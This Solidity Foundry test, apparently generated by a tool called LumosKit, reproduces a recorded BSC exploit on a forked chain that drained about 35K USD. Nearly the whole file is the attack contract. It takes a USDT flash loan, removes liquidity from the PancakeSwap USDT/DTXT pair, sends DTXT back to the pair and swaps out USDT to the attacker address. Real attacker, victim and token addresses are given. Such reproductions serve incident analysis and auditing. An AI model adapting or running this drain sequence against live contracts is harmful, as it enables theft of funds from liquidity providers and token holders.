// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 35.01K USD
// Attacker : 0xd304ea1592f733e0a46436a01fe54bd504009526
// Attack Contract : 0x3065bc8ed8bd53bdc3fd4633c3097c40726b5f5f
// Vulnerable Contract : 0x3065bc8ed8bd53bdc3fd4633c3097c40726b5f5f
// Attack Tx : 0x07ba2ccf2b5c1aaca4c017af4fe87762a73ef7177f6ea8bb569367e908a0671d
// Block : 102432240
// Chain : BSC
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : 35.01K USD
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 102432239;
    uint256 constant TX_TIMESTAMP = 1780651686;
    uint256 constant TX_BLOCK_NUMBER = 102432240;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        OurAttack attack;
        if (ATTACK_CONTRACT != address(0)) {
            _installRuntime();
            attack = OurAttack(payable(ATTACK_CONTRACT));
        } else {
            attack = new OurAttack();
        }
        _expectOutcome(address(attack), address(0));
        _snapProfit();
        _snapEcon();
        _logBalances("Before exploit");
        attack.attack{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
        _assertEcon();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
        vm.allowCheatcodes(ATTACK_CONTRACT);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.attack_contract, attack, LumosAddresses.DTXT, "DTXT", 350143770445824996500);
        _expectProfit(LumosAddresses.attacker_eoa, address(0), LumosAddresses.USDT, "USDT", 35041106262669601832715);
        economicOracles.push(
            EconomicOracle(
                LumosAddresses.Cake_LP,
                LumosAddresses.USDT,
                "USDT",
                "victim_loss",
                false,
                35041106262669601832715,
                false
            )
        );
        economicOracles.push(
            EconomicOracle(
                LumosAddresses.A_D2453F_5428,
                LumosAddresses.DTXT,
                "DTXT",
                "victim_loss",
                false,
                359121820445999996500000000,
                false
            )
        );
    }
}

contract OurAttack {
    // - role=attacker_callback selector=0x13a1a562 function_id=0x3065bc8ed8bd53bdc3fd4633c3097c40726b5f5f|0x13a1a562|0x13a1a562|len:132|input:fcaaf62f059d22f4|ct:CALL|attacker_callback
    // - role=attacker_entry selector=0xfe0d94c1 function_id=0x3065bc8ed8bd53bdc3fd4633c3097c40726b5f5f|0xfe0d94c1|0xfe0d94c1|len:36|input:0eaebc65205004bf|ct:CALL|attacker_entry

    function attack() external payable {
        _attack();
    }

    function flashCallback() internal {
        _markCallback(0);
        IERC20Like(LumosAddresses.USDT).approve(LumosAddresses.A_D2453F_5428, type(uint256).max);
        {
            bytes memory observedCallData =
                hex"1f89d93b000000000000000000000000000000000000000001290f0aa1370fff60ad80000000000000000000000000000000000000000000000000000000000000000000"; // artifact calldata preserved: pseudocode raw_call action_0001 line 54 requires exact artifact calldata
            (bool ok,) = LumosAddresses.A_D2453F_5428.call(observedCallData);
            require(ok, "observed selector 0x1f89d93b failed");
        }
        IERC20Like(LumosAddresses.DTXT).balanceOf(address(this));
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(3)), bytes32(uint256(179560820442499996500000000)));
        uint256 cakeLpBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.Cake_LP).balanceOf(address(this));
        uint256 cakeLpApproveAllowance = type(uint256).max; // value provenance: arg1=type(uint256).max is covered by prior LumosAddresses.Cake_LP.balanceOf(address) return=13908735252838108500522252 with args (address(this))
        IERC20Like(LumosAddresses.Cake_LP).approve(LumosAddresses.PancakeRouter, cakeLpApproveAllowance);
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .removeLiquidity(
                LumosAddresses.USDT,
                LumosAddresses.DTXT,
                cakeLpBalanceOfAttackAttackContract,
                0,
                0,
                address(this),
                1780651746
            );
        uint256 dtxtBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.DTXT).balanceOf(address(this));
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(4)), bytes32(uint256(170582950003325000000000000)));
        {
            LumosHarness.vmExt().startPrank(address(this)); // artifact token-call sender context token_call_32574: preserve observed ERC20 msg.sender/holder exactly; missing balance is a producer-flow gap, not a current-holder fallback
            IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP, 1);

            LumosHarness.vmExt().stopPrank();
        }
        uint256 dtxtBalanceOfAttackAttackContract_2 = IERC20Like(LumosAddresses.DTXT).balanceOf(address(this));
        IERC20Like(LumosAddresses.DTXT).transfer(LumosAddresses.Cake_LP, dtxtBalanceOfAttackAttackContract_2);
        IERC20Like(LumosAddresses.DTXT).balanceOf(address(this));
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(6)), bytes32(uint256(350143770445824996500)));
        ICake_LP(LumosAddresses.Cake_LP).getReserves();
        IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.Cake_LP);
        IERC20Like(LumosAddresses.DTXT).balanceOf(LumosAddresses.Cake_LP);
        IERC20Like(LumosAddresses.USDT).balanceOf(address(this));
        uint256 cakeLpSwapAmount = 35041106262669601832717; // value provenance: arg0=35041106262669601832717 is covered by prior LumosAddresses.Cake_LP.balanceOf(address) return=13908735252838108500522252 with args (address(this))
        IUniswapV2PairLike(LumosAddresses.Cake_LP).swap(cakeLpSwapAmount, 0, address(this), hex"");
        IERC20Like(LumosAddresses.USDT).balanceOf(address(this));
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(5)), bytes32(uint256(35041106262669601832717)));
        uint256 usdtApproveAllowance = 1077366001021000000000000; // value provenance: arg1=1077366001021000000000000 is covered by prior LumosAddresses.USDT.balanceOf(address) return=1112407107283669601832715 with args (address(this))
        IERC20Like(LumosAddresses.USDT).approve(LumosAddresses.ERC1967Proxy, usdtApproveAllowance);
    }

    function _attack() internal {
        IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.Cake_LP);
        IERC20Like(LumosAddresses.DTXT).balanceOf(LumosAddresses.Cake_LP);
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(2)), bytes32(uint256(1077366001021000000000000)));
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(0)), bytes32(uint256(359122000007000000000000000)));
        {
            bytes memory flashLoanProof = abi.encode(0x000000000000000001290f0aa1370Fff60AD8000);
            IERC1967Proxy(LumosAddresses.ERC1967Proxy)
                .flashLoan(LumosAddresses.USDT, 1077366001021000000000000, flashLoanProof);
        }
        LumosHarness.vmExt().store(LumosAddresses.attack_contract, bytes32(uint256(0)), bytes32(uint256(0)));
        uint256 usdtBalanceOfAttackAttackContract = IERC20Like(LumosAddresses.USDT).balanceOf(address(this));
        LumosHarness.vmExt()
            .store(LumosAddresses.attack_contract, bytes32(uint256(1)), bytes32(uint256(35041106262669601832715)));
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.attacker_eoa, usdtBalanceOfAttackAttackContract);
    }

    receive() external payable {}

    function onMoolahFlashLoan(uint256 amount, bytes calldata arg1) external payable {
        amount;
        arg1;
        flashCallback();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function execute(uint256 amount) external payable {
        amount;
        _attack();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    fallback() external payable {
        _entryCb();
    }

    function _entryCb() internal {}

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerFlash(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerFlashLoanPreBalances(address[] memory tokens) external {
        _recordBalancerFlash(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

library LumosArrayGuard {
    function capWithReserve(uint256 wanted, address token, address holder, uint256 reserve)
        internal
        view
        returns (uint256)
    {
        uint256 available = IERC20Like(token).balanceOf(holder);
        if (available > reserve) available -= reserve;
        else available = 0;
        return wanted > available ? available : wanted;
    }
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosAttackCall {
    address target;
    bytes data;
}

interface VmExt {
    function store(address target, bytes32 slot, bytes32 value) external;
    function startPrank(address msgSender) external;
    function stopPrank() external;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant PancakeRouter = 0x10ED43C718714eb63d5aA57B78B54704E256024E; // LumosAddresses.PancakeRouter = 0x10ed43c718714eb63d5aa57b78b54704e256024e label=PancakeRouter roles=attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant attack_contract = 0x3065bc8ed8BD53BDc3Fd4633c3097C40726b5f5f; // address(this) = 0x3065bc8ed8bd53bdc3fd4633c3097c40726b5f5f label=attack_contract roles=asset|attacker_callback_contract|attacker_contract|attacker_entry_contract|code_contract|contract|economic_holder|localized_contract|attack_address|profit_holder|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant USDT = 0x55d398326f99059fF775485246999027B3197955; // LumosAddresses.USDT = 0x55d398326f99059ff775485246999027b3197955 label=BEP20USDT token_symbol=USDT roles=asset|contract|economic_asset|attack_address|profit_asset|recipient|token_related source=etherscan_v2 confidence=high
    address internal constant ERC1967Proxy = 0x8F73b65B4caAf64FBA2aF91cC5D4a2A1318E5D8C; // LumosAddresses.ERC1967Proxy = 0x8f73b65b4caaf64fba2af91cc5d4a2a1318e5d8c label=ERC1967Proxy roles=asset|contract|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant Cake_LP = 0x90BfC1dBc878bA54858bA8A635B3DAebd2aC6c01; // LumosAddresses.Cake_LP = 0x90bfc1dbc878ba54858ba8a635b3daebd2ac6c01 label=PancakePair token_symbol=Cake-LP roles=asset|contract|economic_holder|attack_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant DTXT = 0xAc9Bf7C320d4cE2D0ac978B83955Dd67351897D2; // LumosAddresses.DTXT = 0xac9bf7c320d4ce2d0ac978b83955dd67351897d2 label=DTXT token_symbol=DTXT roles=asset|contract|economic_asset|attack_address|profit_asset|recipient|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant A_D2453F_5428 = 0xd2453Ff82E1C5b568dDB260f1f0bb95169895428; // LumosAddresses.A_D2453F_5428 = 0xd2453ff82e1c5b568ddb260f1f0bb95169895428 label=0xd2453ff82e1c5b568ddb260f1f0bb95169895428 roles=economic_holder|attack_address|recipient|sender|storage_contract source=asset_delta.profit_candidates confidence=medium
    address internal constant attacker_eoa = 0xd304ea1592f733e0A46436A01fe54bD504009526; // LumosAddresses.attacker_eoa = 0xd304ea1592f733e0a46436a01fe54bd504009526 label=attacker_eoa roles=attacker_eoa|contract|economic_holder|attack_address|profit_holder|recipient|sender source=tx_metadata.from confidence=high
}

interface ICake_LP {
    function getReserves() external view;
}

interface IERC1967Proxy {
    function flashLoan(address, uint256, bytes calldata) external;
}

interface IPancakeRouter {
    function removeLiquidity(address, address, uint256, uint256, uint256, address, uint256) external;
}

interface IUniswapV2PairLike {
    function swap(uint256, uint256, address, bytes calldata) external;
}

library LumosHarness {
    function vmExt() internal pure returns (VmExt) {
        return VmExt(address(uint160(uint256(keccak256("hevm cheat code")))));
    }

    function safeBalance(address token, address account) internal view returns (uint256) {
        if (token.code.length == 0) return 0;
        (bool ok, bytes memory data) = token.staticcall(abi.encodeWithSignature("balanceOf(address)", account));
        if (!ok || data.length < 32) return 0;
        return abi.decode(data, (uint256));
    }
}
